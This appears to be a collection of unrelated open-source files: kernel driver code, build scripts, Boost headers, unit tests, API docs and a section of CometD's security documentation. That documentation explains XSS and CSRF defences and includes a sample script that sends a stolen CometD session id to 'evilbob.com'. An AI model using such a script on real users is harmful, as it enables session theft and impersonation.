rx_queue->page_ring[index] = NULL;
/* page_remove cannot exceed page_add. */
if (rx_queue->page_remove != rx_queue->page_add)
++rx_queue->page_remove;
/* If page_count is 1 then we hold the only reference to this page. */
if (page_count(page) == 1) {
++rx_queue->page_recycle_count;
return page;
} else {
state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev, state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
put_page(page);
++rx_queue->page_recycle_failed;
}
return NULL;
}
/**
* efx_init_rx_buffers - create EFX_RX_BATCH page-based RX buffers
*
* @rx_queue: Efx RX queue
*
* This allocates a batch of pages, maps them for DMA, and populates
* struct efx_rx_buffers for each one. Return a negative error code or
* 0 on success. If a single page can be used for multiple buffers,
* then the page will either be inserted fully, or not at all.
*/
static int efx_init_rx_buffers(struct efx_rx_queue *rx_queue, bool atomic)
{
struct efx_nic *efx = rx_queue->efx;
struct efx_rx_buffer *rx_buf;
struct page *page;
unsigned int page_offset;
struct efx_rx_page_state *state;
dma_addr_t dma_addr;
unsigned index, count;
count = 0;
do {
page = efx_reuse_page(rx_queue);
if (page == NULL) {
page = alloc_pages(__GFP_COLD | __GFP_COMP |
(atomic ? GFP_ATOMIC : GFP_KERNEL),
efx->rx_buffer_order);
if (unlikely(page == NULL))
return -ENOMEM;
dma_addr =
dma_map_page(&efx->pci_dev->dev, page, 0,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
if (unlikely(dma_mapping_error(&efx->pci_dev->dev,
dma_addr))) {
__free_pages(page, efx->rx_buffer_order);
return -EIO;
}
state = page_address(page);
state->dma_addr = dma_addr;
|
{
"pile_set_name": "Github"
}
| null | null |
# Contributor: Oleg Titov <oleg.titov@gmail.com>
# Maintainer: Oleg Titov <oleg.titov@gmail.com>
pkgname=py3-catalogue
pkgver=2.0.1
pkgrel=0
pkgdesc="Super lightweight function registries for your library"
url="https://github.com/explosion/catalogue"
arch="noarch"
license="MIT"
depends="py3-importlib-metadata"
makedepends="py3-setuptools"
checkdepends="py3-pytest"
subpackages="$pkgname-doc"
source="$pkgname-$pkgver.tar.gz::https://github.com/explosion/catalogue/archive/v$pkgver.tar.gz"
builddir=$srcdir/catalogue-$pkgver
build() {
python3 setup.py build
}
check() {
pytest-3 catalogue/tests/test_catalogue.py
}
package() {
python3 setup.py install --prefix=/usr --root="$pkgdir"
install -Dm644 README.md "$pkgdir/usr/share/doc/$pkgname/README.md"
}
sha512sums="a0fd0dcccbd8dfa2662b058882118c73b5d1afbbadda9a03d21212b7c75dc79d78432d31a1922523491aad092af20463ce1bbfb3cd286d95bab367cb2f67ed55 py3-catalogue-2.0.1.tar.gz"
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
{
"f1": (SELECT value BITCLEAR(6, 1))[0],
"f2": (SELECT value BITCLEAR(6, [1, 2]))[0],
"f3": (SELECT value BITCLEAR(31, [1, 2, 4, 5]))[0],
"f4": (SELECT value BITCLEAR(int8("31"), [int16("1"), float("2"), double("4"), 5]))[0]
};
|
{
"pile_set_name": "Github"
}
| null | null |
# will_pop_scope_demo
检测页面是否被弹出的demo。
收录于MTechViral的youtube视频https://www.youtube.com/watch?v=fYBCzgBRkb4&list=PLR2qQy0Zxs_Wot7YfLeeKdMlJ9838C_w0&index=2
## 样例


## Getting Started
For help getting started with Flutter, view our online
[documentation](https://flutter.io/).
|
{
"pile_set_name": "Github"
}
| null | null |
using System.Collections.Generic;
using Volo.Abp.AspNetCore.Mvc.UI.Bundling;
namespace Volo.CmsKit.Public.Web.Pages.CmsKit.Shared.Components.ReactionSelection
{
public class ReactionSelectionStyleBundleContributor : BundleContributor
{
public override void ConfigureBundle(BundleConfigurationContext context)
{
context.Files.AddIfNotContains("/Pages/CmsKit/Shared/Components/ReactionSelection/default.css");
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
'Go on with the next verse,' the Gryphon repeated impatiently: 'it
begins "I passed by his garden."'
Alice did not dare to disobey, though she felt sure it would all come
wrong, and she went on in a trembling voice:--
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0"?>
<doc xml:lang="en">
<assembly>
<name>Microsoft.AI.WindowsServer</name>
</assembly>
<members>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Web App Role Environment context information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppNameEnvironmentVariable">
<summary>Azure Web App name corresponding to the resource name.</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppHostNameEnvironmentVariable">
<summary>Azure Web App Hostname. This will include the deployment slot, but will be same across instances of same slot.</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Role Environment context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer">
<summary>
A telemetry context initializer that will set component context version on the base of BuildInfo.config information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.version">
<summary>
The version for this component.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes version of the telemetry item with the version obtained from build info if it is available.
</summary>
<param name="telemetry">The telemetry context to initialize.</param>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.LoadBuildInfoConfig">
<summary>
Loads BuildInfo.config and returns XElement.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.GetVersion">
<summary>
Gets the version for the current application. If the version cannot be found, we will return the passed in default.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule">
<summary>
Telemetry module that sets developer mode to true when is not already set AND managed debugger is attached.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.IsDebuggerAttached">
<summary>
Function that checks whether debugger is attached with implementation that can be replaced by unit test code.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Gives the opportunity for this telemetry module to initialize configuration object that is passed to it.
</summary>
<param name="configuration">Configuration object.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer">
<summary>
A telemetry context initializer that will gather device context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Populates device properties on a telemetry item.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer">
<summary>
Obsolete. A telemetry context initializer that used to populate role instance name. Preserved for backward compatibility.
Note that role instance will still be populated with the machine name as in the previous versions.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Obsolete method.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.instance">
<summary>
The singleton instance for our reader.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleName">
<summary>
The Azure role name (if any).
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleInstanceName">
<summary>
The Azure role instance name (if any).
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader"/> class.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Instance">
<summary>
Gets or sets the singleton instance for our application context reader.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.BaseDirectory">
<summary>
Gets or sets the base directly where hunting for application DLLs is to start.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Initialize">
<summary>
Initializes the current reader with respect to its environment.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleName">
<summary>
Gets the Azure role name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleInstanceName">
<summary>
Gets the Azure role instance name.
</summary
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright 2011 Harald Wellmann.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied.
*
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.wicketstuff.osgi.util;
import java.util.Map;
import java.util.Map.Entry;
import org.apache.wicket.WicketRuntimeException;
import org.osgi.framework.BundleContext;
import org.osgi.framework.Filter;
import org.osgi.framework.FrameworkUtil;
import org.osgi.framework.InvalidSyntaxException;
import org.osgi.util.tracker.ServiceTracker;
/**
* A utility class for looking up services from the OSGi registry. The methods of this class wait
* for the service for a given timeout (default 10 seconds) and throw a
* {@code WicketRuntimeException} when no matching service becomes available during this period.
* <p>
* NOTE: Prefixing some method calls with our own class name is a workaround for a bug in the Oracle
* Java compiler, which does not occur when compiling in Eclipse.
*
* @author Harald Wellmann
*
*/
public class OsgiServiceLookup
{
public static final long DEFAULT_TIMEOUT = 10000;
public static <T> T getOsgiService(BundleContext bc, String className)
{
return OsgiServiceLookup.<T> getOsgiService(bc, className, DEFAULT_TIMEOUT, null);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, Map<String, String> props)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT, props);
}
/**
* Returns a service matching the given criteria.
*
* @param <T>
* class implemented or extended by the service
* @param bc
* bundle context for accessing the OSGi registry
* @param type
* class implemented or extended by the service
* @param timeout
* maximum wait period in milliseconds
* @param props
* properties to be matched by the service
* @return matching service (not null)
* @throws WicketRuntimeException
*/
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout,
Map<String, String> props)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, props);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, null);
}
@SuppressWarnings("unchecked")
public static <T> T getOsgiService(BundleContext bc, String className, long timeout,
Map<String, String> props)
{
ServiceTracker tracker = createServiceTracker(bc, className, props);
try
{
tracker.open();
Object svc = tracker.waitForService(timeout);
if (svc == null)
{
throw new WicketRuntimeException("gave up waiting for service " + className);
}
return (T)svc;
}
catch (InterruptedException exc)
{
throw new WicketRuntimeException(exc);
}
finally
{
tracker.close();
}
}
private static ServiceTracker createServiceTracker(BundleContext bc, String className,
Map<String, String> props)
{
if (props == null || props.isEmpty())
{
return new ServiceTracker(bc, className, null);
}
StringBuilder builder = new StringBuilder("(&(objectClass=");
builder.append(className);
builder.append(')');
for (Entry<String, String> entry : props.entrySet())
{
builder.append('(');
builder.append(entry.getKey());
builder.append('=');
builder.append(entry.getValue());
builder.append(')');
}
builder.append(')');
try
{
Filter filter;
filter = FrameworkUtil.createFilter(builder.toString());
ServiceTracker tracker = new ServiceTracker(bc, filter, null);
return tracker;
}
catch (InvalidSyntaxException exc)
{
throw new WicketRuntimeException(exc);
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#ifndef BOOST_PP_IS_ITERATING
#if !defined(FUSION_MAKE_SET_09162005_1125)
#define FUSION_MAKE_SET_09162005_1125
#include <boost/preprocessor/iterate.hpp>
#include <boost/preprocessor/repetition/enum_params.hpp>
#include <boost/preprocessor/repetition/enum_binary_params.hpp>
#include <boost/preprocessor/repetition/enum_params_with_a_default.hpp>
#include <boost/preprocessor/repetition/repeat_from_to.hpp>
#include <boost/fusion/support/config.hpp>
#include <boost/fusion/container/set/set.hpp>
#include <boost/fusion/support/detail/as_fusion_element.hpp>
#include <boost/fusion/support/pair.hpp>
#if !defined(BOOST_FUSION_DONT_USE_PREPROCESSED_FILES)
#include <boost/fusion/container/generation/detail/preprocessed/make_set.hpp>
#else
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 2, line: 0, output: "preprocessed/make_set" FUSION_MAX_SET_SIZE_STR".hpp")
#endif
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
This is an auto-generated file. Do not edit!
==============================================================================*/
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 1)
#define FUSION_HASH #
#endif
namespace boost { namespace fusion
{
struct void_;
namespace result_of
{
template <
BOOST_PP_ENUM_PARAMS_WITH_A_DEFAULT(
FUSION_MAX_VECTOR_SIZE, typename T, void_)
, typename Extra = void_
>
struct make_set;
template <>
struct make_set<>
{
typedef set<> type;
};
}
// XXX:
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
FUSION_HASH if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
FUSION_HASH else
BOOST_CONSTEXPR
FUSION_HASH endif
#else
#if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
#else
BOOST_CONSTEXPR
#endif
#endif
BOOST_FUSION_GPU_ENABLED
inline set<>
make_set()
{
return set<>();
}
#define BOOST_FUSION_AS_FUSION_ELEMENT(z, n, data) \
typename detail::as_fusion_element<BOOST_PP_CAT(T, n)>::type
#define BOOST_PP_FILENAME_1 <boost/fusion/container/generation/detail/pp_make_set.hpp>
#define BOOST_PP_ITERATION_LIMITS (1, FUSION_MAX_VECTOR_SIZE)
#include BOOST_PP_ITERATE()
#undef BOOST_FUSION_ELEMENT
#undef BOOST_FUSION_AS_ELEMENT
}}
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#undef FUSION_HASH
#pragma wave option(output: null)
#endif
#endif // BOOST_FUSION_DONT_USE_PREPROCESSED_FILES
#endif
#else // defined(BOOST_PP_IS_ITERATING)
///////////////////////////////////////////////////////////////////////////////
//
// Preprocessor vertical repetition code
//
///////////////////////////////////////////////////////////////////////////////
#define N BOOST_PP_ITERATION()
namespace result_of
{
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
#define TEXT(z, n, text) , text
struct make_set< BOOST_PP_ENUM_PARAMS(N, T) BOOST_PP_REPEAT_FROM_TO(BOOST_PP_DEC(N), FUSION_MAX_SET_SIZE, TEXT, void_) >
#undef TEXT
{
typedef set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)> type;
};
}
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>
make_set(BOOST_PP_ENUM_BINARY_PARAMS(N, T, const& arg))
{
return set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>(
BOOST_PP_ENUM_PARAMS(N, arg));
}
#undef N
#endif // defined(BOOST_PP_IS_ITERATING)
|
{
"pile_set_name": "Github"
}
| null | null |
[[_security]]
== Security
This session discusses the security features of the Bayeux Protocol and the
relationship with common attacks and how you can configure CometD to tighten
your application.
=== Security of the CometD session id
The Bayeux Protocol identifies a particular session (formerly known as "client")
via a session id token, carried in Bayeux messages by the `clientId` field.
The `clientId` field value (i.e. the session id) is generated by the server
when the client sends the handshake request message, and sent back to the
client in the handshake response message (see
xref:_bayeux_meta_handshake[the Bayeux Protocol handshake]).
The client then sends the `clientId` field in every subsequent message to the
server, until disconnection.
The session id is generated using a strong random number generator, and as
such it is not guessable by an evil third party.
An evil user that knows its own session id cannot guess the session id of
another user by just looking at its own session id.
While the non-guessability of the session id is a good starting point, it
is typically not enough, so read on.
=== Security against man-in-the-middle attacks
An evil user may be in the position to observe Bayeux Protocol traffic, as
it is the case for a man-in-the-middle.
The typical solution in this case is to encrypt the traffic between the
client and the server using TLS.
In this way, all the traffic between the client and the server is
encrypted end-to-end and a man-in-the-middle cannot look or otherwise retrieve
someone else's session id.
[[_security_xss]]
=== Security against Cross-Site Scripting (XSS) attacks
A https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)[cross-site scripting attack]
is a particularly important vulnerability of web applications.
A typical example of XSS is the following:
Evil user Bob connects to a chat service that uses CometD.
There, he finds Alice, another user.
Bob sends an evil chat message text to Alice where the text is the following:
====
[source,html]
----
<script type="text/javascript">
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://evilbob.com?stolen=" + $.cometd.getClientId());
xhr.send();
</script>
----
====
As you can see, the script accesses the CometD's session id (via
`$.cometd.getClientId()`).
[NOTE]
====
Removing the method `getClientId()` would not solve the issue, because
the evil script could access the session id in other ways.
For example, by registering an extension, or by otherwise watching
Bayeux messages that come and go for the normal functioning of the
application, or by quickly disconnecting and reconnecting the session, etc.
====
Bob sends that evil message, which reaches the CometD server and gets routed
to Alice. When it arrives on Alice's browser, that script may be run by
the browser if the application is XSS vulnerable.
If the script runs, Bob would be able to steal Alice's session id, send
it to his server `evilbob.com`, where Bob would be able to access it.
[IMPORTANT]
====
If your web application is XSS vulnerable, an attacker can do
a lot more damage than just stealing a CometD session id, so it is of
paramount importance that your web application sanitizes data received
from unknown sources such as other users chat messages.
====
If Bob has stolen Alice's session id, he could craft a Bayeux message
with Alice's session id and send it from his computer, and thereby could
impersonate Alice.
CometD protects from impersonations due to stolen session ids in different
ways, depending on the type of transport used to carry Bayeux messages.
For transports based on HTTP (`long-polling` and `callback-polling`),
CometD sends a HTTP cookie with the handshake response, marked as `HttpOnly`,
called `BAYEUX_BROWSER` (see xref:_java_server_configuration[]).
The CometD implementation, on the server, maps this cookie to a legit
session id during the processing of the handshake request message.
For every subsequent message, the browser will send the `BAYEUX_BROWSER`
cookie to the server and the CometD implementation will
retrieve the session id from legit sessions that have been mapped to the
cookie, rather than from the message (where it could have been altered).
Bob could craft a message with Alice's session id, but the `BAYEUX_BROWSER`
cookie that he will send along with the tampered message will be his,
not Alice's. The CometD implementation will detect this attack and ask
Bob to re-handshake.
If the crafted message does not have any cookie, CometD will ask Bob to
re-handshake.
For transports based on WebSocket (`websocket`), CometD trusts the particular
connection that has been established during the handshake.
The session id is associated to that connection and when a WebSocket message
arrives on that connection, and CometD retrieves the session id from the
association with the connection, rather than from the message (where it
could have been altered).
When the connection is closed, for example for a network failure, CometD
attempts to open another connection.
If the reconnection happens within a short period of time (typically less than
the `maxInterval` configured on the server), then CometD will try to send
messages on the new connection without re-handshaking, but since it's a new
connection that did not process a handshake message, it will not have a
session id associated.
At this point, CometD could ask the client to re-handshake (which involves
some round-trips to be completed, possibly slowing further down the
communication in case of faulty networks), or it could trust the session
id from the message (which would yield faster reconnections, albeit less
secure if the session id is stolen).
This is controlled by the `requireHandshakePerConnection` parameter, see
xref:_java_server_configuration[].
[[_security_csrf]]
=== Security against Cross Site Request Forgery (CSRF) attacks
A https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)[cross site request forgery attack]
is a particularly important vulnerability of web applications.
A typical example of CSRF is the following:
Evil user Bob connects to the chat service at `cometd-chat.com` using CometD. There,
he finds Alice, another user. Bob sends an evil chat message text to Alice where the
text is the following:
====
[source,html]
----
Look at this: https://evilbob.com/cometd
----
====
Alice clicks on the link, her browser opens a new tab to `+https://evilbob.com/cometd+`
and an entertaining HTML page containing a script is downloaded to Alice's browser.
While Alice is looking at Bob's entertaining page, her browser runs an evil script,
which may perform actions on behalf of Alice on the chat service that uses CometD.
For example, Bob could use xref:_security_xss[XSS] to steal Alice's session id and
then craft and send evil messages to the chat service _from Alice's browser_.
Alice's browser will send the existing Alice's `BAYEUX_BROWSER` cookie along with
the evil messages, and to the server the evil messages will be indistinguishable
from legit messages sent by Alice, because they will carry her `BAYEUX_BROWSER`
cookie and her stolen session id.
CometD does not automatically protects against CSRF attacks, but these are easily
counterfeit by configuring the cross-origin filter as explained in
xref:_java_server_configuration_advanced[this section].
Alice's legit messages are sent by a script downloaded from the chat service, and
therefore will have the following HTTP header:
====
[source]
----
Origin: https://cometd-chat.com
----
====
Conversely, Bob's evil script is downloaded from `+https://evilbob.com+` and his
evil messages will have the following HTTP header:
====
[source]
----
Origin: https://evilbob.com
----
====
The application at `cometd-chat.com` can install the cross-origin filter and
configure it to allow requests only from the `cometd-chat.com` origin,
effectively blocking Bob's CSRF attack.
This works because browsers are required to perform a _preflight_ request
before sending
|
{
"pile_set_name": "Github"
}
| null | null |
<?php
/**
* Copyright © Magento, Inc. All rights reserved.
* See COPYING.txt for license details.
*/
namespace Magento\Customer\Test\Unit\Model\Address\Config;
class ReaderTest extends \PHPUnit\Framework\TestCase
{
/**
* @var \Magento\Customer\Model\Address\Config\Reader
*/
protected $_model;
/**
* @var \Magento\Framework\Config\FileResolverInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_fileResolverMock;
/**
* @var \Magento\Customer\Model\Address\Config\Converter|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_converter;
/**
* @var \Magento\Customer\Model\Address\Config\SchemaLocator
*/
protected $_schemaLocator;
/**
* @var \Magento\Framework\Config\ValidationStateInterface|\PHPUnit_Framework_MockObject_MockObject
*/
protected $_validationState;
protected function setUp()
{
$this->_fileResolverMock = $this->createMock(\Magento\Framework\Config\FileResolverInterface::class);
$this->_fileResolverMock->expects(
$this->once()
)->method(
'get'
)->with(
'address_formats.xml',
'scope'
)->will(
$this->returnValue(
[
file_get_contents(__DIR__ . '/_files/formats_one.xml'),
file_get_contents(__DIR__ . '/_files/formats_two.xml'),
]
)
);
$this->_converter = $this->createPartialMock(
\Magento\Customer\Model\Address\Config\Converter::class,
['convert']
);
$moduleReader = $this->createPartialMock(\Magento\Framework\Module\Dir\Reader::class, ['getModuleDir']);
$moduleReader->expects(
$this->once()
)->method(
'getModuleDir'
)->with(
'etc',
'Magento_Customer'
)->will(
$this->returnValue('stub')
);
$this->_schemaLocator = new \Magento\Customer\Model\Address\Config\SchemaLocator($moduleReader);
$this->_validationState = $this->createMock(\Magento\Framework\Config\ValidationStateInterface::class);
$this->_validationState->expects($this->any())
->method('isValidationRequired')
->willReturn(false);
$this->_model = new \Magento\Customer\Model\Address\Config\Reader(
$this->_fileResolverMock,
$this->_converter,
$this->_schemaLocator,
$this->_validationState
);
}
public function testRead()
{
$expectedResult = new \stdClass();
$constraint = function (\DOMDocument $actual) {
try {
$expected = __DIR__ . '/_files/formats_merged.xml';
\PHPUnit\Framework\Assert::assertXmlStringEqualsXmlFile($expected, $actual->saveXML());
return true;
} catch (\PHPUnit\Framework\AssertionFailedError $e) {
return false;
}
};
$this->_converter->expects(
$this->once()
)->method(
'convert'
)->with(
$this->callback($constraint)
)->will(
$this->returnValue($expectedResult)
);
$this->assertSame($expectedResult, $this->_model->read('scope'));
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2001-2011 Hartmut Kaiser
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
=============================================================================*/
#if !defined(SPIRIT_SEQUENCE_APR_22_2006_0811AM)
#define SPIRIT_SEQUENCE_APR_22_2006_0811AM
#if defined(_MSC_VER)
#pragma once
#endif
#include <boost/spirit/home/qi/operator/sequence_base.hpp>
#include <boost/spirit/home/qi/detail/fail_function.hpp>
#include <boost/spirit/home/qi/meta_compiler.hpp>
namespace boost { namespace spirit
{
///////////////////////////////////////////////////////////////////////////
// Enablers
///////////////////////////////////////////////////////////////////////////
template <>
struct use_operator<qi::domain, proto::tag::shift_right> // enables >>
: mpl::true_ {};
template <>
struct flatten_tree<qi::domain, proto::tag::shift_right> // flattens >>
: mpl::true_ {};
}}
namespace boost { namespace spirit { namespace qi
{
template <typename Elements>
struct sequence : sequence_base<sequence<Elements>, Elements>
{
friend struct sequence_base<sequence<Elements>, Elements>;
sequence(Elements const& elements)
: sequence_base<sequence<Elements>, Elements>(elements) {}
private:
template <typename Iterator, typename Context, typename Skipper>
static detail::fail_function<Iterator, Context, Skipper>
fail_function(
Iterator& first, Iterator const& last
, Context& context, Skipper const& skipper)
{
return detail::fail_function<Iterator, Context, Skipper>
(first, last, context, skipper);
}
std::string id() const { return "sequence"; }
};
///////////////////////////////////////////////////////////////////////////
// Parser generators: make_xxx function (objects)
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Modifiers>
struct make_composite<proto::tag::shift_right, Elements, Modifiers>
: make_nary_composite<Elements, sequence>
{};
// ///////////////////////////////////////////////////////////////////////////
// // Define what attributes are compatible with a sequence
// template <typename Attribute, typename Elements, typename Context, typename Iterator>
// struct is_attribute_compatible<Attribute, sequence<Elements>, Context, Iterator>
// : mpl::or_<
// is_convertible<Attribute
// , typename traits::attribute_of<sequence<Elements>, Context, Iterator>::type>
// , traits::is_fusion_sequence_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// , traits::is_container_compatible<qi::domain, Attribute
// , sequence<Elements>, Context, Iterator>
// >
// {};
}}}
namespace boost { namespace spirit { namespace traits
{
///////////////////////////////////////////////////////////////////////////
template <typename Elements>
struct has_semantic_action<qi::sequence<Elements> >
: nary_has_semantic_action<Elements> {};
///////////////////////////////////////////////////////////////////////////
template <typename Elements, typename Attribute, typename Context
, typename Iterator>
struct handles_container<qi::sequence<Elements>, Attribute, Context
, Iterator>
: mpl::true_ {};
}}}
#endif
|
{
"pile_set_name": "Github"
}
| null | null |
# Acknowledgements
This application makes use of the following third party libraries:
## WHUCalendar
Copyright (c) 2016 tiger8888 <seekarmor@139.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
